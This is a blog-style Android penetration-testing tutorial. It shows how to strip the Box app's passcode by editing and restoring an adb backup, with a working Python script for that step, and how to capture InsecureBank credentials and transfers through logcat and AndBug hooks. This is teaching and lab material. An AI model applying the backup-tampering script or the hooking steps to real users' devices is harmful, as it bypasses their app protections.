Saturday, December 24, 2016

ANDROID PT / Backup Vulnerability


BACKUP VULNERABILITY

- Layout for this exercise:

- Connecting Santoku to Nexus 5:




- The backup and restoration processes of some Android applications are vulnerable because the backup contents can be altered offline and then restored to the device, all without root privileges. The precondition is that the application allows backups at all: android:allowBackup in the manifest defaults to true, and an application that sets android:allowBackup="false" is excluded from adb backup and is therefore not exposed to this attack.


- Some of these vulnerabilities were discovered and investigated by Chris John Riley and Aditya Gupta.

- In this exercise the Android Backup Extractor (abe) will be used:

https://sourceforge.net/projects/adbextractor/





- Once downloaded to Santoku, let's unzip abe:










- To test the backup vulnerability, the application box.apk (package com.box.android) will be used:




- Installing box.apk to the mobile device:






- Going to Settings, a passcode is introduced:








- From now on, the application asks for the passcode after a 1 minute timeout:




- Detecting the name of the package used by the application:





- adb backup takes a backup of the application's data, given its package name, and writes it to the file box.ab. The extension .ab stands for "android backup":








- The user is prompted on the mobile device to confirm the backup. The dialog also offers an optional backup password; none is set here, so the resulting file is unencrypted and can be edited:




- The backup process is successful:












- hexdump shows the start of box.ab; the ASCII header "ANDROID BACKUP" confirms that it is actually an Android backup:







- It is important to notice that an Android backup (*.ab) file is a short text header (the "ANDROID BACKUP" magic, the format version, a compression flag and the encryption algorithm, "none" when no backup password was set) followed by a zlib-compressed tar archive. The Android Backup Extractor converts between the two forms, so box.ab is unpacked to box.tar:






- Extracting with tar, all the files of box.tar are displayed:





- Listing the files of box.tar to a file box.list. The list records the order of the entries, which is needed later to rebuild the archive in the same order:






- Now, the whole package com.box.android is available to be analyzed:





- Going deeper into the folder's structure down to sp (shared preferences):



- Looking up into apps:




- The encrypted PIN is stored in the shared preferences file myPreference.xml:




- Opening myPreference.xml, the line with the encrypted pin is detected:







- With the purpose of altering the application's state, the line corresponding to the encrypted PIN is simply removed. No decryption is needed: the entry is deleted, not forged:




- Now, to rebuild the backup archive once it has been altered, the pax command is used. Feeding it the file list saved earlier keeps the members in their original order, which the restore process expects:

- pax reads the file names from box.list (the altered tree) and writes them, in that order, to a new archive box1.tar:






- The Android Backup Extractor performs the reverse operation, packing instead of unpacking, and creates the file box1.ab from the altered box1.tar:






- hexdump shows the start of box1.ab; the "ANDROID BACKUP" header confirms that it is again a valid Android backup:






- Restoring the backup with ADB:




- The user is prompted on the mobile device to confirm the restoration (notice that neither passcode nor PIN is requested):





- The restoration of data is eventually successful:









- The alteration can also be verified in the application: Settings now shows Require passcode = Never, even though a passcode requirement was set earlier:
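The whole procedure above (unpack the .ab container, delete the PIN entry from the shared preferences file, repack a restorable .ab) as an added example in Python; this is not code from the original post or from the Android Backup Extractor. The container layout (text header, then a zlib-compressed tar) is the real .ab format; the package name com.box.android is the one the post shows, while the path of the preferences file inside the backup, the key name "encrypted_pin" and the contents of the sample backup are assumptions constructed here so the script runs offline.

```python
"""Unpack an Android backup (.ab), delete a preference entry, repack it.

Added example, not code from the original post or from the Android Backup
Extractor. The container layout (text header, then a zlib-compressed tar)
is the real .ab format; the member path, the key name "encrypted_pin" and
the sample backup contents are assumptions constructed for this example.
"""
import io
import tarfile
import zlib
import xml.etree.ElementTree as ET
from typing import Dict, Tuple

AB_MAGIC = b"ANDROID BACKUP\n"
PREF_PATH = "apps/com.box.android/sp/myPreference.xml"  # assumed member path
PIN_KEY = "encrypted_pin"                              # assumed preference name

# Constructed SharedPreferences file; the PIN value is a placeholder.
SAMPLE_PREFS = b"""<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="encrypted_pin">QmFzZTY0UGxhY2Vob2xkZXI=</string>
    <string name="require_passcode">1 minute</string>
</map>
"""


def parse_ab(ab: bytes) -> Tuple[bytes, bytes]:
    """Return (format version, raw tar bytes) from an unencrypted .ab file.

    Header lines after the magic: version, "1" if zlib-compressed, and the
    encryption algorithm ("none" or "AES-256"). Password-protected backups
    cannot be edited without the password, so they are rejected here.
    """
    if not ab.startswith(AB_MAGIC):
        raise ValueError("not an Android backup file")
    version, compressed, encryption, payload = ab[len(AB_MAGIC):].split(b"\n", 3)
    if encryption != b"none":
        raise ValueError("encrypted backup (%s): password needed" % encryption.decode())
    if compressed == b"1":
        payload = zlib.decompress(payload)
    return version, payload


def build_ab(tar_bytes: bytes, version: bytes = b"1") -> bytes:
    """Wrap a tar archive in a compressed, unencrypted .ab container."""
    return AB_MAGIC + version + b"\n1\nnone\n" + zlib.compress(tar_bytes)


def files_from_tar(tar_bytes: bytes) -> Dict[str, bytes]:
    """Read every regular file out of an in-memory tar, keeping member order."""
    files: Dict[str, bytes] = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        for member in tar.getmembers():
            if member.isfile():
                files[member.name] = tar.extractfile(member).read()
    return files


def tar_from_files(files: Dict[str, bytes]) -> bytes:
    """Write {path: content} back into a tar in insertion order
    (the restore side expects the members in their original order)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def drop_pref(xml_bytes: bytes, key: str) -> bytes:
    """Remove the <map> entry whose name attribute equals key."""
    root = ET.fromstring(xml_bytes)
    victims = [e for e in root if e.get("name") == key]
    if not victims:
        raise KeyError(key)
    for e in victims:
        root.remove(e)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def strip_pin_from_backup(ab: bytes) -> bytes:
    """The post's attack end to end: unpack, delete the PIN entry, repack."""
    version, tar_bytes = parse_ab(ab)
    files = files_from_tar(tar_bytes)
    files[PREF_PATH] = drop_pref(files[PREF_PATH], PIN_KEY)
    return build_ab(tar_from_files(files), version)


def make_sample_backup() -> bytes:
    """A constructed stand-in for box.ab as adb backup would produce it."""
    return build_ab(tar_from_files({PREF_PATH: SAMPLE_PREFS}))


if __name__ == "__main__":
    altered = strip_pin_from_backup(make_sample_backup())
    print(files_from_tar(parse_ab(altered)[1])[PREF_PATH].decode())
```

In a real run the bytes returned by strip_pin_from_backup would be written to box1.ab and pushed back with adb restore box1.ab; the device still asks the user to confirm the restore, but, as the post shows, not for the application's passcode.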







Friday, December 23, 2016

ANDROID PT / Hooking with AndBug


HOOKING WITH ANDBUG
- Layout for this exercise:





- Connecting Santoku to Nexus 5:




 0 - INSECURE BANK


- The exercises in this post use the InsecureBank application, written by Dinesh Shetty.

- InsecureBank is an intentionally vulnerable application used to gain training on different Android platform attacks. 

- This exercise covers insecure logging and how to hook the application at run time with the tool AndBug.




- Installing the application from Santoku to Nexus 5, using ADB:






- InsecureBank.apk works in a client/server model: the server (app.py) runs on Santoku, listening on port 8888, and the client runs on the mobile device.


- Starting the server on Santoku with the script app.py, located inside the folder AndroLabServer:






- Starting the application at the mobile device:




- Configuring the preferences:




- Serveip is Santoku's IP:




- Listening port for the server is 8080. Whatever value is entered here must match the port app.py is actually listening on, otherwise the client cannot log in:





1 - INSECURE LOGGING 

- Once the application is running, let's detect its PID:





- Logging the application with ADB logcat:





- Introducing the default credentials and signing in:

username: dinesh
password: dines@123$




- logcat informs immediately about the login trial:





- Then, performing a transaction of 1 million dollar from Account 1111 to Account 2222:




- Again, logcat immediately reports the transaction, including the account numbers and the amount:
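The two findings above (credentials and transaction details written to the system log) can be hunted for automatically. The following is an added example in Python, not code from the original post or from InsecureBank: it parses logcat's threadtime layout (what adb logcat -v threadtime prints), restricts the lines to the application's PID as the post does, and flags leaked values. The log lines are constructed; the tag "InsecureBank" and the message wording are assumptions, not what the real application logs.

```python
"""Flag secrets that an application writes to logcat, filtered by PID.

Added example, not code from the original post or from InsecureBank.
The log lines below are constructed in logcat's threadtime layout; the
tag and message wording are assumptions, not the real application's output.
"""
import re
from typing import Dict, Iterable, Iterator, List, Optional

# threadtime layout: "MM-DD HH:MM:SS.mmm  PID  TID LEVEL TAG: message"
LOGCAT_RE = re.compile(
    r"^(?P<date>\d\d-\d\d) (?P<time>\d\d:\d\d:\d\d\.\d{3})\s+"
    r"(?P<pid>\d+)\s+(?P<tid>\d+)\s+(?P<level>[VDIWEF])\s+"
    r"(?P<tag>[^:]*?)\s*: (?P<msg>.*)$"
)

# Values that have no business in a log; group 1 is the leaked value.
SENSITIVE = {
    "password": re.compile(r"password\s*[=:]\s*(\S+)", re.I),
    "pin": re.compile(r"\bpin\s*[=:]\s*(\d+)", re.I),
    "account": re.compile(r"\baccount\s*[=:]\s*(\d{4,})", re.I),
    "amount": re.compile(r"\bamount\s*[=:]\s*(\d+(?:\.\d+)?)", re.I),
}

# Constructed sample; PID 4217 stands for the InsecureBank process.
SAMPLE_LOG = """\
12-23 18:41:07.221  4217  4217 D InsecureBank: login username=dinesh password=dines@123$
12-23 18:41:07.230  1412  1502 I ActivityManager: Displayed com.android.insecurebank/.PostLogin: +312ms
12-23 18:42:15.004  4217  4230 D InsecureBank: transfer from account=1111 to account=2222 amount=1000000
12-23 18:42:15.010  4217  4230 D dalvikvm: GC_CONCURRENT freed 401K, 12% free
12-23 18:42:16.100  3999  3999 D OtherApp: password=notours
"""


def parse_logcat(lines: Iterable[str]) -> Iterator[Dict[str, str]]:
    """Yield one dict per well-formed threadtime line; banners are skipped."""
    for line in lines:
        m = LOGCAT_RE.match(line)
        if m:
            yield m.groupdict()


def scan(lines: Iterable[str], pid: Optional[int] = None) -> List[Dict[str, str]]:
    """Return every sensitive value found, optionally restricted to one PID.

    Filtering by PID mirrors the post's workflow: find the application's
    PID first, then look only at that process's log lines.
    """
    findings: List[Dict[str, str]] = []
    for entry in parse_logcat(lines):
        if pid is not None and int(entry["pid"]) != pid:
            continue
        for kind, rx in SENSITIVE.items():
            for m in rx.finditer(entry["msg"]):
                findings.append({"pid": entry["pid"], "tag": entry["tag"],
                                 "kind": kind, "value": m.group(1)})
    return findings


def redact(line: str) -> str:
    """Mask the leaked values so a captured log can be shared safely."""
    for rx in SENSITIVE.values():
        line = rx.sub(lambda m: m.group(0).replace(m.group(1), "***"), line)
    return line


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines(), pid=4217):
        print("%(pid)s %(tag)s leaks %(kind)s: %(value)s" % f)
    print(redact(SAMPLE_LOG.splitlines()[0]))
```

Against a live device the same functions would be fed the output of adb logcat -v threadtime; the patterns are deliberately simple and should be extended with whatever field names the application under test actually uses.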








2 - HOOKING WITH ANDBUG

- Hooking an application is a very useful technique to analyze and understand on the go how applications work.

- AndBug is a wrapper around the Java Debug Wire Protocol (JDWP), the protocol used for communication between a debugger and the Java virtual machine it debugs, called the target VM. On a production device JDWP is only exposed for applications built with android:debuggable="true" (or when the device itself runs with ro.debuggable=1), so a release build has to be repackaged with that flag before AndBug can attach to it.

- AndBug allows analyzing the methods and the arguments passed to them while the application is running, by setting trace and hook points on those methods.

- AndBug can be found here:

https://github.com/swdunlop/AndBug





- Once AndBug has been downloaded to Santoku:




- Installing it with setup.py:




- Looking up the PID of the application insecurebank.apk:




- Running andbug against that PID and loading the classes of the application's package:




- Checking which methods the .RestClient class exposes:




- Setting up a hook for the .dotransfer method:




- Performing a transaction with the mobile application:




- When .dotransfer is called, AndBug displays on Santoku the arguments passed to it, that is, all the details of the transaction: